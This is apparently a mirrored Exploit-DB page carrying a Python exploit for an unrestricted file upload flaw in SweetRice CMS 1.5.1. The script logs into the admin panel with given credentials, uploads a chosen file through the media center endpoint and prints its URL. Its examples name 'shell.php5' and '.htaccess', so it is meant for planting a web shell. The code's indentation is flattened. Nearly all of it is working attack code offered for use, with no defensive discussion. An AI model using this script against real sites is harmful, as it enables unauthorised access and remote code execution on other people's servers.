SweetRice 1.5.1 – Arbitrary File Upload

  • 作者: Ashiyane Digital Security Team
    日期: 2016-11-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40716/
  • #/usr/bin/python
#-*- Coding: utf-8 -*-
# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql

import requests
import os
from requests import session

if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
pass
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|___________ __________.__|
| / _____/____ ____ _____/|\______ \__| ________|
| \_____\\ \/ \/ // __ \_/ __ \ __\ _/|/ ___\/ __ \ |
| /\\ /\___/\___/|| || \\\__\___/ |
|/_______/ \/\_/\___>\___>__| |____|_/__|\___>___>|
|\/ \/ \/\/\/\/ |
|> SweetRice 1.5.1 Unrestricted File Upload |
|> Script Cod3r : Ehsan Hosseini|
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''

print(banner)


# Get Host & User & Pass & filename
host = input("Enter The Target URL(Example : localhost.com) : ")
username = input("Enter Username : ")
password = input("Enter Password : ")
filename = input("Enter FileName (Example:.htaccess,shell.php5,index.html) : ")
file = {'upload[]': open(filename, 'rb')}

payload = {
'user':username,
'passwd':password,
'rememberMe':''
}



with session() as r:
login = r.post('http://' + host + '/as/?type=signin', data=payload)
success = 'Login success'
if login.status_code == 200:
print("[+] Sending User&Pass...")
if login.text.find(success) > 1:
print("[+] Login Succssfully...")
else:
print("[-] User or Pass is incorrent...")
print("Good Bye...")
exit()
pass
pass
uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)
if uploadfile.status_code == 200:
print("[+] File Uploaded...")
print("[+] URL : http://" + host + "/attachment/" + filename)
pass